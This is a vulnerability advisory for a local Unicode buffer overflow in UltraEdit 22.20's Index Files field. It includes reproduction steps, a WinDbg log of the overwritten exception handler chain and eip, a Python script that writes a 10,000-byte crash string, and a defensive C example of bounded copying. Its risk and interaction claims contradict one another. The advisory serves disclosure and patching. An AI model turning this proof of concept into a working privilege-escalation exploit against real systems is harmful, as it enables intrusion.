UltraEdit 22.20 – Unicode Buffer Overflow Vulnerability

A classic local unicode buffer overflow vulnerability has been discovered in the official UltraEdit v22.20 software client. The vulnerability allows local attackers to gain higher system or access privileges by exploiting the overflow.

The vulnerability is located in the Menu -> Project -> Options -> Index Files module. Local attackers with a low-privilege or otherwise restricted system user account are able to compromise the local system by exploiting this classic unicode buffer overflow. The attacker copies a string of a specific byte size into the Index Files input to overflow the process and overwrite the exception handler chain and registers such as eip (see the WinDbg log below). This allows the attacker to take over the software client's process and compromise the local system/server.

The security risk of the buffer overflow vulnerability is estimated as high, with a CVSS (Common Vulnerability Scoring System) score of 6.3. Exploitation of the vulnerability requires a low-privilege system user account and no user interaction. Successful exploitation of the local vulnerability results in system compromise by elevation of privileges via overwrite of the registers.

Vulnerable Module(s):
[+] Menu > Project > Options > Index Files (Input)

Product & Service Introduction:
===============================

UltraEdit by IDM is the ideal text, HTML and hex editor, and an advanced PHP, Perl, Java and JavaScript editor for programmers. UltraEdit is also an XML editor including a tree-style XML parser. An industry award winner, UltraEdit supports disk-based 64-bit file handling (standard) on both 32- and 64-bit Windows platforms.

(Copy of the Homepage: http://www.ultraedit.com/downloads/ultraedit_download.html)

Date of Discovery:
==================

2015-09-16

Exploitation Technique:
=======================

Local

Platform Tested:
===============

Windows 7

Solution – Fix & Patch:
=======================

Restrict the Option > Index File input by size and allocate the destination buffer accordingly, so that input to the vulnerable field cannot overflow the process; input longer than the buffer must be rejected before it is copied.

Risk Level:
===========

Proof of Concept (PoC):
=======================

The local buffer overflow vulnerability can be exploited by local attackers with a restricted system user account, without user interaction. For a security demonstration or to reproduce the issue, follow the information and steps below.

Manual steps to reproduce the vulnerability ...
1. Install the software and start the client
2. Copy the AAAA... string from bof.txt to the clipboard
3. Run UltraEdit.exe
4. Go to Menu -> Project -> Options -> Index Files
5. Paste the AAAA... string into the input field and click Browse
6. The software crashes reliably or shuts down
7. Successful reproduction of the local buffer overflow vulnerability!

--- Debug Log (WinDBG) ---
eax=00000000 ebx=00000000 ecx=00410041 edx=77a372cd esi=00000000 edi=00000000
eip=00410041 esp=0024e284 ebp=0024e2a4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
uedit32+0x10041:
00410041 0200            add     al,byte ptr [eax]          ds:0023:00000000=??
0:000> !exchain
0024e298: ntdll!RtlRaiseStatus+c8 (77a372cd)
0024ecf4: uedit32+10041 (00410041)
Invalid exception stack at 00410041
0:000> d 0024ecf4
0024ecf4  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed04  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed14  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed24  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed34  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed44  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed54  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed64  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

PoC: Exploit Client v20.0.0
# Writes the 10000-byte "AAAA..." string that step 2 of the reproduction copies to the clipboard.
buffer = "A" * 10000
with open("bof.txt", "w") as f:
    f.write(buffer)
print("File Created")
print(" Contact msk4@live.fr")
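The following C example is added here and is not UltraEdit's or the advisory author's code. It models two points of the finding: why the pasted ASCII string appears in memory as 41 00 41 00 and as 0x00410041 in eip (the edit control hands the application UTF-16LE), and the bounded copy the Solution section asks for. The buffer size INDEX_PATH_MAX and all function names are assumptions.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the Index Files path buffer in UTF-16 code units; hypothetical. */
#define INDEX_PATH_MAX 260

/* Windows edit controls hand the application UTF-16LE text: each ASCII
 * 'A' (0x41) becomes the byte pair 41 00. Returns the bytes written. */
size_t ascii_to_utf16le(const char *in, uint8_t *out, size_t out_cap)
{
    size_t n = 0;
    for (; *in && n + 2 <= out_cap; ++in) {
        out[n++] = (uint8_t)*in;  /* low byte: the ASCII code point */
        out[n++] = 0x00;          /* high byte: zero for ASCII */
    }
    return n;
}

/* Four consecutive bytes of that pattern read as a little-endian 32-bit
 * value; for "AAAA" this is 0x00410041, the eip value in the WinDbg log. */
uint32_t poc_pattern_word(void)
{
    uint8_t buf[8];
    ascii_to_utf16le("AAAA", buf, sizeof buf);   /* constructed sample input */
    return (uint32_t)buf[0] | ((uint32_t)buf[1] << 8) |
           ((uint32_t)buf[2] << 16) | ((uint32_t)buf[3] << 24);
}

/* Hardened copy into the fixed buffer: the size restriction the Solution
 * section calls for. Input that does not fit with its terminator is refused
 * outright, with no partial copy. Returns 0 on success, -1 when rejected. */
int set_index_path(uint16_t dst[INDEX_PATH_MAX], const uint16_t *src, size_t src_units)
{
    if (src_units >= INDEX_PATH_MAX) return -1;   /* would overflow: reject */
    memcpy(dst, src, src_units * sizeof(uint16_t));
    dst[src_units] = 0;
    return 0;
}

/* Returns 1 if an input of `units` code units (e.g. the PoC's 10000 'A's) is accepted. */
int index_path_accepts(size_t units)
{
    uint16_t dst[INDEX_PATH_MAX];
    uint16_t *src = calloc(units ? units : 1, sizeof *src);
    if (!src) return 0;
    for (size_t i = 0; i < units; ++i) src[i] = 0x0041;   /* UTF-16 'A' */
    int ok = set_index_path(dst, src, units) == 0;
    free(src);
    return ok;
}
```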
